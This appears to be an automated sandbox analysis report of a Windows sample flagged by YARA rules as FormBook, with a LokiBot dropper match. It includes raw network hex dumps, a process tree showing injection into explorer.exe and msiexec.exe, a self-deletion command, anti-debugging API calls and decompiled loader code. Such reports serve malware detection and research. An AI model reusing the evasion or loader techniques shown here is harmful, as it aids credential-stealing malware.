                        Data Raw: c0 4c c3 db cd c5 93 5d 55 14 39 b6 3e 24 13 09 bd 46 7f a3 38 d8 f5 8c 62 41 6f 79 33 d1 c3 6e 24 67 7f be 71 ac 91 32 8e a6 51 82 fb 00 c1 d3 18 14 ac 84 80 9b 97 89 ea 59 7b ab 1c fa b4 72 2c 81 92 87 0a 86 9b f1 e4 60 41 0f ba e3 88 b0 31 87 78 80 d1 c2 4b 58 e6 7e 0a 2f c2 89 af 4c 45 22 b7 b4 a3 90 3b 8f c8 35 eb 5b 59 ae 80 25 67 8a 69 1a 7d e9 5c 2c 34 91 9f d4 99 bf 3a 3d 90 ea 69 a3 02 a5 ec d4 54 93 61 e7 99 3e 6a 28 09 e2 bf b1 11 7c 2a e8 0f d2 66 3d f5 e1 cb a7 e1 1c 31 56 c2 72 72 9e e3 c4 a1 6a c0 e3 30 fa e7 f2 ca 24 ff a7 55 a4 4f 33 01 64 7f 01 ec 28 a6 29 5f 7c 26 dd 8a 41 7c 37 9e 8a 1b c5 98 14 0e 18 7e d5 02 a4 e3 0d 9e e4 ae 42 19 16 6b ed 05 06 39 95 07 40 ec a0 c0 13 c8 1b 2e 54 80 5c 88 94 a6 ff 92 8e 21 0c 19 87 b0 a3 64 29 6d e0 4a 11 d0 c3 d0 d8 36 07 d7 4b f1 a6 7e da a4 16 72 74 b9 e2 f1 30 0b ff 67 72 41 3f 0c e0 b9 d3 c0 6c d6 a5 6a ee e1 99 b7 af 45 55 6a 38 6b f8 4c 53 45 df 8c c5 b4 51 38 56 e8 29 78 f6 27 05 4d 08 a2 d1 1e 24 4a 3f 54 e7 1f a5 bd ff 23 4d de 9b d4 48 98 e3 38 e7 8d 8f 2b c0 a3 dd 39 d7 2f 5d cd d5 93 5f 5b 31 5e b9 3d 02 84 a3 d2 47 05 b9 ba 54 b3 e3 64 dc c9 5c 66 2a 93 d0 b1 70 da 29 d0 65 5f 1c ed ec 81 c6 17 43 00 91 d7 08 98 cd 2d 50 a1 05 53 dd 30 3a e2 4b c0 d0 e7 64 e2 59 4d c8 fa 0e 96 86 f2 9c b3 28 59 1c 76 de c9 bb 54 7e a7 2a 14 87 05 2f eb cc 33 75 64 1a fd e8 e7 a3 4a 0f 8e c6 60 ce e5 b2 95 8c ba 53 39 bf 74 c2 0f 71 90 27 b5 75 bb 1b 12 91 78 d9 85 00 58 ef d6 f4 d5 f9 87 dc 4f 01 42 41 93 45 e9 a7 c9 b3 bf 6c 26 6f b7 51 8b 1b 40 3b 27 08 67 28 15 76 1b 99 02 a2 49 c3 42 4e 83 36 7a c7 f8 ae 35 e9 ce 98 5e 54 33 fc 71 2e cc 8c 40 9b de a5 8a 77 7c 75 60 43 10 81 de bd 93 56 68 9c d7 70 c0 c9 92 7e a3 09 77 de 8a eb c6 d0 15 ae 89 64 71 ef c2 4f d9 a4 61 fd 86 9e 30 d2 59 90 47 3c 65 50 33 b3 1f 16 a5 9b 6d 75 1b 18 fe dd 91 da 35 a5 cc 78 ad a4 63 87 84 26 5c 61 22 38 f1 4b 07 da c2 b9 c0 64 aa 66 53 7f 19 78 45 d4 9a 97 a9 3e a4 5b ac bf d5 ce 32 85 4a 24 a1 55 e7 62 8e ef b2 ca 8c f9 b4 14 10 f5 77 0d 09 a5 d8 b2 61 3d 6d 0d b6 df d7 38 b8 da 38 ba 76 17 20 fc 00 01 89 6e 54 0f 4c 65 12 0b 8b c6 a9 e7 ec cd b8 27 90 a9 57 ee 85 e6 9d e1 36 fb d4 02 87 9f c9 28 c3 dc 13 2c d0 57 64 9f ac e5 ad b6 d2 9d bd 36 57 91 62 3f 90 fe 91 01 ce ab f9 88 77 d0 64 99 be 90 82 ca d7 69 05 c6 05 ea 51 3d 4a b1 07 f4 87 4c 9a c1 e8 f0 5c b0 11 2b 76 fd 38 c2 b4 87 42 ca e5 2e 53 47 cc cf be fc 1d 0b 1d b0 d2 52 d3 75 41 2b a8 9b 9c 6c bd 7d 98 fa 69 cc 11 82 0e 67 1d f7 d2 27 fb 8e 81 2d 41 88 d3 d2 8b db 2c 20 38 7e 2c e8 8a f4 93 cb fc 12 bd fe b6 ea f4 be c0 fd 71 c7 44 ff 59 e8 63 5e 4b f9 e2 4e 5b aa 62 e5 03 f2 71 ff 2e e5 92 49 4d fa 26 bd 06 83 65 3e 1c 68 0c b8 39 b2 5a a2 58 3a 58 f6 a2 83 e7 f0 54 a7 49 eb 7b 34 85 16 fe 7f c1 2d cd d7 be 1a cd d7 ad 02 cb 61 db d7 d5 e2 86 9b f1 e4 38 c2 e7 b3 68 40 33 f1 bb f3 80 d2 03 c8 98 ce 7d 02 d0 23 19 af 4c 45 22 b7 b4 a3 90 3b 8f c8 35 eb 5b 59 ae 80 25 67 8a 69 1a 7d e9 5c 2c 34 91 9f d4 59 bf 3a 3d 9e f5 d3 ad 02 11 e5 19 75 2b 60 ab 54 1f 3e 40 60 91 9f c1 63 13 4d 9a 6e bf 46 5e 94 8f a5 c8 95 3c 53 33 e2 00 07 f0 c3 ad cf 4a 84 ac 63 da 8a 9d ae 41 d1 aa 58 ae 6b 33 01 64 7f 01 ec 28 0d d5 57 96 c9 40 ec f8 93 aa f8
                        Data Ascii: L]U9>$F8bAoy3n$gq2QY{r,`A1xKX~/LE";5[Y%gi}\,4:=iTa>j(|*f=1Vrrj0$UO3d()_|&A|7~Bk9@.T\!d)mJ6K~rt0grA?ljEUj8kLSEQ8V)x'M$J?T#MH8+9/]_[1^=GTd\f*p)e_C-PS0:KdYM(YvT~*/3udJ`S9tq'uxXOBAEl&oQ@;'g(vIBN6z5^T3q.@w|u`CVhp~wdqOa0YG<eP3mu5xc&\a"8KdfSxE>[2J$Ubwa=m88v nTLe'W6(,Wd6Wb?wdiQ=JL\+v8B.SGRuA+l}ig'-A, 8~,qDYc^KN[bq.IM&e>h9ZX:XTI{4-a8h@3}#LE";5[Y%gi}\,4Y:=u+`T>@`cMnF^<S3JcAXk3d(W@
                        Nov 19, 2020 10:49:58.891516924 CET5399INData Raw: 33 f4 58 fe ad fa 18 b3 6c ab 39 85 b4 6a e4 56 fb f5 8b 0d 54 f1 06 c2 2c e9 dd 8a 19 92 7a ab 73 c1 c9 e6 e5 88 94 a6 ff 92 8e 21 0c 19 87 b0 a3 64 29 6d e0 1a 54 d0 c3 9c d9 37 07 77 f5 ef e7 7e da a4 16 72 74 b9 e2 11 30 09 fe 6c 73 4b 3f 0c
                        Data Ascii: 3Xl9jVT,zs!d)mT7w~rt0lsK?$ljDDUj(kLGQ8F)x'H$J?Q#M{H8+yV/]O[1^-GTd\f*p)e_C-PS0:KdYM(YvT~*/3u
                        Nov 19, 2020 10:49:58.891535044 CET5400INData Raw: d7 38 b8 da 38 ba 76 17 20 fc 00 01 89 6e 54 0f 4c 65 12 0b 8b c6 a9 e7 ec cd b8 27 90 a9 57 ee 85 e6 9d e1 36 fb d4 02 87 9f c9 28 c3 dc 13 2c d0 57 64 9f ac e5 ad b6 d2 9d bd 36 57 91 62 3f 90 fe 91 01 ce ab f9 88 77 d0 64 99 be 90 82 ca d7 69
                        Data Ascii: 88v nTLe'W6(,Wd6Wb?wdiQ=JL\+v8B.SGRuA+l}ig'-A, 8~,qDYc^KN[bq.IM&e>h9ZX:XTI{4-
                        Nov 19, 2020 10:49:58.891551971 CET5402INData Raw: c7 44 44 55 6a 28 6b f8 4c b3 47 df 8c c5 f4 51 38 46 e8 29 78 f4 27 05 48 08 a3 d1 1e 24 4a 3f 51 e7 1e a5 bd ff 23 4d de 7b d6 48 98 e1 38 e7 8d 8f 2b c0 a1 dd 79 56 2f 5d dd d5 93 4f 5b 31 5e b9 2d 02 84 b3 d2 47 05 b9 ba 54 a3 e3 64 dc c9 5c
                        Data Ascii: DDUj(kLGQ8F)x'H$J?Q#M{H8+yV/]O[1^-GTd\f*p)e_C-PS0:KdYM(YvT~*/3udJ`S9tq'uxXOBAEl&o%c4;'vI@N&z5^T3q
                        Nov 19, 2020 10:49:59.207879066 CET5403INData Raw: 44 91 03 a8 7b 94 71 f8 33 fe b0 c0 49 64 0c 8a 0b 0f 3e 92 ae c4 4c 7a ec 9e cc 0d 33 11 42 50 b3 51 d4 e5 83 14 39 44 f5 d5 00 e1 89 ea f7 84 ec 50 e7 f9 e8 f8 c3 95 a6 b0 fc fc 59 c6 d7 a1 75 e4 2c a7 bd 82 79 d6 27 ac 43 ef 16 9f c8 f4 be 43
                        Data Ascii: D{q3Id>Lz3BPQ9DPYu,y'CC9azrusKmJ#}6>YEq4^swsF&5F(]1F?7]+ H&S}*3AjSaq,\,4[_n u.%asf
                        Nov 19, 2020 10:49:59.207909107 CET5404INData Raw: 16 2a 69 4d 3d e8 bc b5 0b 4d 27 5f 48 fd ab 5e fa 5a da 37 34 25 ce 14 2b 18 9b d4 4b 5f ec 3d 8b 4e 7d 0d 63 28 a8 d9 07 b1 5b 15 40 ab 81 9a c8 f6 58 c2 aa 0b 37 cc 8a 42 f1 16 25 20 26 ae f4 71 39 09 e9 c2 fc 52 09 52 a8 c6 40 b9 70 bd 0e 57
                        Data Ascii: *iM=M'_H^Z74%+K_=N}c([@X7B% &q9RR@pWYD3B)lw$JxfOcO5@|Wld+H!Zd-&}!Bh5mU[%zMn,Q_JXHe[kbM R[]dgv
                        Nov 19, 2020 10:49:59.207926035 CET5406INData Raw: 87 2b 91 6d e7 01 fe 0d 8e 71 54 9f 66 8e c8 12 db 42 f9 6a cb 90 5b af 89 54 c4 4d a5 ba 50 32 48 31 27 73 1a 0f ab 72 f3 51 14 f3 00 e2 03 80 3e a5 b5 af 4e dd 48 2f 50 fd 34 0e fe f2 9f 25 03 67 0c 1b c7 b0 c9 9d 34 87 b6 f1 45 0c 7f f6 1f d4
                        Data Ascii: +mqTfBj[TMP2H1'srQ>NH/P4%g4E.^up1np_(+u8~$o`+zWYpS.L)Qd@gAbM?KLf({Sg7iTQi*CO+}Td(M=TT~u5w].Xm!`jYJi
                        Nov 19, 2020 10:49:59.207943916 CET5407INData Raw: a7 1f 24 f3 26 3e 02 20 b8 fe bd e0 71 2c a7 60 4c b3 47 93 d9 a2 6d ff 8b a4 b1 3f df f7 4c 3e a9 73 1d 4e 87 aa b1 f8 bf 51 e1 12 ab 00 7d a2 cd 16 31 12 a0 f2 f7 3b f4 3e 14 73 bf 66 8d 8b be b0 f9 61 98 bc ef 21 8b 4e 31 91 ed 84 2f 8f 3f fb
                        Data Ascii: $&> q,`LGm?L>sNQ}1;>sfa!N1/?sr9X-:&~Yo0st>]dsiZ3)@{j9G8U[UbhVeqxPzbJ5sL9@2IZ'<3/GrvA_,[s9VUzqt\<QZ`6
                        Nov 19, 2020 10:49:59.207961082 CET5408INData Raw: 4d 4b 5c a7 87 c1 bc f2 6e 4f a3 51 7f 83 ad 08 95 dd f8 f1 a6 d3 cb 21 4f 44 b9 78 bf 21 64 0a 2c b8 da b6 d6 de f0 0b 9a 54 ab 55 a6 44 91 56 1a e5 99 ec b2 6d b4 53 07 99 11 a7 5f 37 6a 32 03 fe 9d c7 82 dc 39 52 30 65 72 3d 74 1d 0f ad 54 be
                        Data Ascii: MK\nOQ!ODx!d,TUDVmS_7j29R0er=tT.'Pe:QLxl8{LashoGh"uDw,SI@xO5L+'*<cY2j%[KG%h?>:)+^B$rvtv:z;S)N[,g
                        Nov 19, 2020 10:49:59.207978010 CET5410INData Raw: 25 77 a5 be e7 43 a8 d9 5b 61 02 47 58 38 53 bf 6f 47 c3 65 5b cd 3a 65 12 2e ea 65 fe e5 d9 31 d5 10 3d 35 5a cc 87 6c 62 6b 06 62 d9 5c 9e 22 33 0f c2 7d d2 49 c8 cc e9 e8 62 d8 81 d8 b7 4d 55 7d 97 56 3e 5b 9a 6a b7 54 28 cd 85 b5 24 aa ab 6e
                        Data Ascii: %wC[aGX8SoGe[:e.e1=5Zlbkb\"3}IbMU}V>[jT($ndut's5I(8$fQH\etom+G'o\jG_FP$,/-R-zeAQCVZLHS5*vC>?h1eib\iG
                        Nov 19, 2020 10:49:59.207998991 CET5411INData Raw: cb f2 d5 57 96 42 1c 74 fc 12 4c 07 33 f4 58 cd f9 4a 1c 38 9b 98 68 95 75 94 ec d7 1d 0a 8b 0d 54 7a 72 72 28 28 13 9a d8 59 72 98 80 4a 94 16 64 6b 6b a6 ff 92 05 7d 94 1d 46 73 ab 57 da e6 bd e6 95 2b db 1d 3a c8 07 77 f5 dc 93 e6 de 2f 4b 82
                        Data Ascii: WBtL3XJ8huTzrr((YrJdkk}FsW+:w/KGM?c$KnXL(kMbH( Y.58/+)RSF-82bt].f*[u^Mjv(,8=(&7$<E5D


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: 2eD17GZuWs.exe PID: 4700 Parent PID: 5852

                        General

                        Start time:10:48:23
                        Start date:19/11/2020
                        Path:C:\Users\user\Desktop\2eD17GZuWs.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x400000
                        File size:61440 bytes
                        MD5 hash:C05EEE88F0B57E853996957D6523397B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Visual Basic
                        Reputation:low

                        Chronological Activities

                        Analysis Process: 2eD17GZuWs.exe PID: 2936 Parent PID: 4700

                        General

                        Start time:10:48:34
                        Start date:19/11/2020
                        Path:C:\Users\user\Desktop\2eD17GZuWs.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x400000
                        File size:61440 bytes
                        MD5 hash:C05EEE88F0B57E853996957D6523397B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Chronological Activities

                        Analysis Process: explorer.exe PID: 3424 Parent PID: 2936

                        General

                        Start time:10:50:04
                        Start date:19/11/2020
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:
                        Imagebase:0x7ff6fee60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: autofmt.exe PID: 6660 Parent PID: 3424

                        General

                        Start time:10:50:22
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\autofmt.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                        Imagebase:0x1150000
                        File size:831488 bytes
                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Chronological Activities

                        Analysis Process: msiexec.exe PID: 6680 Parent PID: 3424

                        General

                        Start time:10:50:22
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\msiexec.exe
                        Imagebase:0x1240000
                        File size:59904 bytes
                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, Author: Florian Roth
                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 6244 Parent PID: 6680

                        General

                        Start time:10:50:26
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 5668 Parent PID: 6244

                        General

                        Start time:10:50:27
                        Start date:19/11/2020
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Disassembly

                        Code Analysis

                        Reset < >

                          Analysis Process: 2eD17GZuWs.exe PID: 4700 Parent PID: 5852 2eD17GZuWs.exeCOMMON

                          Executed Functions

                          Function 021D06B1, Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 579COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: W.E$1.!T$ntdll
                          • API String ID: 1029625771-2038033260
                          • Opcode ID: df1d7e25fe2405ffd91c6f2229c7137afdf75735c254c4b97c50faf073f8e9f5
                          • Instruction ID: da6c13bd5bdf25b3afe99597867547dd07f21777d6c1d61eb1295c7637d27d36
                          • Opcode Fuzzy Hash: df1d7e25fe2405ffd91c6f2229c7137afdf75735c254c4b97c50faf073f8e9f5
                          • Instruction Fuzzy Hash: F9028C347C0305FEEF346E648CA47EA23679F4A394FD5012AEC9A97185D77988C6CA12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D54F4, Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 738nativethreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                            • Part of subcall function 021D5A6C: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021D5609,00000040,021D0570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021D5A87
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                          • String ID: 1.!T
                          • API String ID: 449006233-3147410236
                          • Opcode ID: 0dfa85546250b16a6c5da4e598c3570d59c47ef42f48d5360ab09f9800666a5b
                          • Instruction ID: 3f5ea58cb1dd9bff4e398ad37589425be4b76c7b3ed3c32903b690e3d5b5694f
                          • Opcode Fuzzy Hash: 0dfa85546250b16a6c5da4e598c3570d59c47ef42f48d5360ab09f9800666a5b
                          • Instruction Fuzzy Hash: 75328B706C0342EEEF249E24CDD4BEA77A3EF16360F958269EDA18B2C5D3758485C712
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D1721, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 428libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: 7HoB$DV
                          • API String ID: 1029625771-80660350
                          • Opcode ID: ca13a13595e608c10fbbadc0993d19df2e946924c5c70a6849d37526f0df436c
                          • Instruction ID: 5a908f6629ec2082088456565de20adf5bcdbaf807367af9599522959bda9f05
                          • Opcode Fuzzy Hash: ca13a13595e608c10fbbadc0993d19df2e946924c5c70a6849d37526f0df436c
                          • Instruction Fuzzy Hash: 5DE116717C0716FFEB189F28CC90BE6B3A6BF05350F554229ECA993281D734A895CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D5336, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID: 1.!T
                          • API String ID: 4046476035-3147410236
                          • Opcode ID: ed3628479d0de84b9dd0271451d3fd2b69bb2c35695d0e1f0b0588ecae73788e
                          • Instruction ID: 11cb60185cfd5f5b43619e5707f7fb0162dbd1432ebac15ca7d56ef4384af4ad
                          • Opcode Fuzzy Hash: ed3628479d0de84b9dd0271451d3fd2b69bb2c35695d0e1f0b0588ecae73788e
                          • Instruction Fuzzy Hash: 895188747C035AEEFF283E789DA0BFB22569F457A0F944229EDA2971C0D775C880C652
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D044B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • EnumWindows.USER32(021D04A1,?,00000000,00000000,00000040,00000000,?), ref: 021D0481
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: EnumInformationThreadWindows
                          • String ID: 1.!T
                          • API String ID: 1954852945-3147410236
                          • Opcode ID: 90e507608f2d66145d6797fe60ab3e5fb8efb1446268302234f37188e06cb9a0
                          • Instruction ID: 292e5238c4320d3bf330745f545a2686b2b195e862a4b09e556b445abfe0b68e
                          • Opcode Fuzzy Hash: 90e507608f2d66145d6797fe60ab3e5fb8efb1446268302234f37188e06cb9a0
                          • Instruction Fuzzy Hash: 923179343C0305EEFB14AE388DA0BEB37969F49794F504229EDA6972C0E774C841C651
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401218, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 762COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edx, signed int __edi, void* __esi) {
				signed char _t253;
				signed char _t254;
				signed char _t256;
				signed int _t257;
				void* _t258;
				signed int _t261;
				signed char _t262;
				signed int _t265;
				signed int _t266;
				signed char _t268;
				signed int _t269;
				intOrPtr* _t270;
				signed char _t271;
				signed char _t272;
				void* _t274;
				signed char _t277;
				signed char _t278;
				signed char _t279;
				signed char _t280;
				signed char _t282;
				intOrPtr* _t283;
				intOrPtr* _t284;
				intOrPtr* _t285;
				intOrPtr* _t287;
				intOrPtr* _t289;
				void* _t290;
				intOrPtr* _t291;
				void* _t292;
				intOrPtr* _t293;
				void* _t295;
				intOrPtr* _t296;
				void* _t297;
				intOrPtr* _t298;
				signed char _t300;
				signed int _t301;
				signed char _t302;
				intOrPtr* _t303;
				void* _t304;
				signed int _t305;
				intOrPtr* _t307;
				intOrPtr* _t308;
				void* _t309;
				intOrPtr* _t310;
				intOrPtr* _t311;
				intOrPtr* _t312;
				intOrPtr* _t313;
				signed int _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char _t317;
				intOrPtr* _t319;
				intOrPtr* _t322;
				intOrPtr* _t323;
				intOrPtr* _t324;
				signed char _t325;
				signed int _t329;
				void* _t331;
				signed int _t334;
				void* _t336;
				signed char _t339;
				void* _t340;
				signed int _t341;
				signed int _t342;
				signed char _t344;
				intOrPtr* _t347;
				void* _t348;
				signed int _t351;
				signed int _t352;
				signed int _t355;
				intOrPtr* _t356;
				intOrPtr* _t357;
				intOrPtr* _t358;
				void* _t359;
				void* _t360;
				void* _t361;
				signed char _t362;
				signed int _t367;
				intOrPtr* _t369;
				signed int _t370;
				signed int _t372;
				signed int _t373;
				void* _t379;
				signed int _t380;
				signed char _t383;
				void* _t384;
				intOrPtr* _t385;
				signed int _t387;
				signed int _t390;
				signed int _t394;
				intOrPtr* _t395;
				void* _t396;
				void* _t401;
				signed int _t402;
				signed int _t406;
				void* _t407;
				void* _t408;
				signed int _t409;
				signed int _t411;
				signed int _t414;
				signed int _t415;
				signed int _t417;
				void* _t419;
				void* _t420;
				void* _t422;
				signed int _t423;
				intOrPtr _t438;
				signed int _t440;
				intOrPtr _t448;
				intOrPtr _t449;
				intOrPtr _t450;
				intOrPtr _t451;
				signed int _t454;
				intOrPtr _t462;
				intOrPtr _t464;
				intOrPtr _t467;
				intOrPtr _t470;
				signed int _t476;
				intOrPtr* _t479;
				signed char _t483;
				intOrPtr _t484;
				signed char _t489;
				intOrPtr _t490;
				signed char _t493;
				intOrPtr _t498;

				_t380 = __edx;
				_t369 = __ecx;
				_push("VB5!6&*"); // executed
				L00401210(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t253 = __eax + 1;
				 *_t253 =  *_t253 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *__edi =  *__edi + _t253;
				_t254 = _t253 | 0x000000c7;
				asm("stosd");
				asm("pushfd");
				_t354 = __ebx + _t254;
				_t394 = __esi + 1;
				_t255 = __edi;
				_t383 = _t254;
				asm("sbb eax, 0xa17d13c7");
				asm("popad");
				asm("in eax, 0x0");
				 *__edi =  *__edi + __edi;
				 *__edi =  *__edi + __edi;
				 *__ecx =  *__ecx + __edi;
				 *__edi =  *__edi + __edi;
				 *__edi =  *__edi + __edi;
				 *((intOrPtr*)(__edi + __edi)) =  *((intOrPtr*)(__edi + __edi)) + __edi;
				 *__edi =  *__edi + __edi;
				asm("popad");
				asm("o16 jz 0x75");
				if( *__edi >= 0) {
					L4:
					_t383 = _t383 - 1;
					 *_t255 =  *_t255 + _t255;
				} else {
					 *__edi =  *__edi + __edi;
					 *__edi =  *__edi + __edi;
					 *__edi =  *__edi + __edi;
					 *__edi =  *__edi + __edi;
					 *__edi =  *__edi + __edi;
					_t414 =  *(_t401 + 0x74) * 0x73 - 1;
					 *__edi =  *__edi ^ __edi;
					_pop(ds);
					_t401 = 0xafadf0f4;
					_t352 = _t354;
					_t354 = __edi;
					 *0xFFFFFFFFAFADF0A0 =  *0xFFFFFFFFAFADF0A0 | 0x000000ed;
					_t255 = _t352 - 0xb9;
					 *((intOrPtr*)(__edx + 0x3ba912d4)) = cs;
					asm("cmc");
					asm("invalid");
					if(_t255 >= 0) {
						 *0xaa7e7c1b = _t255;
						_t255 = _t255 + 0xf0;
						_push(0xafadf0f4);
						_t354 = __edi ^  *(__ecx - 0x48ee309a);
						asm("cdq");
						asm("iretw");
						asm("adc [edi+0xaa000c], esi");
						asm("pushad");
						asm("rcl dword [ebx], cl");
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						asm("rol dword [0x4f0000], 0x0");
						goto L4;
					}
				}
